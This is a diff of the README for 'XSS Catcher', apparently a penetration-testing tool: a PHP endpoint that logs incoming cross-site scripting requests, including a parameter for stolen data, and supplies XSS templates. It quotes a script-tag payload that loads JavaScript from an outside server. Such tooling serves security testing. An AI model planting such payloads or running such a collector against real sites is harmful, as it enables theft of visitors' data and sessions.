ivan-sincek/xss-catcher/README.md

 # XSS Catcher

-PHP API for storing all incoming XSS requests and various XSS templates.
+PHP API for storing all incoming XSS requests.
+Also including various XSS templates.

-Incoming XSS request can have `data` (i.e. stolen data), `site`, `redirect`, and `info` HTTP request parameters.
+Incoming XSS request can have `data` (i.e., stolen data), `site`, `redirect`, and `info` HTTP request parameters.

-Use `redirect` with `<script src="https://myserver.com?redirect=xss.js"></script>` to both, store an XSS request and execute JavaScript code.
-Redirect file e.g. `xss.js` will resolve to the relative path on your web server, i.e. `./xss.js`.
+Use `<script src="https://myserver.com?redirect=xss.js"></script>` payload to both, store the incoming XSS request and execute additional JavaScript code specified in `xss.js` - where `xss.js` is equal to the relative path `./xss.js`.

-Play with the given examples and make your own (possibly shorter).
+Play with the given payloads and create your own, possibly shorter.

 Tested on XAMPP for Windows v7.4.3 (64-bit) with Chrome v92.0.4515.131 (64-bit) and Firefox v90.0.2 (64-bit).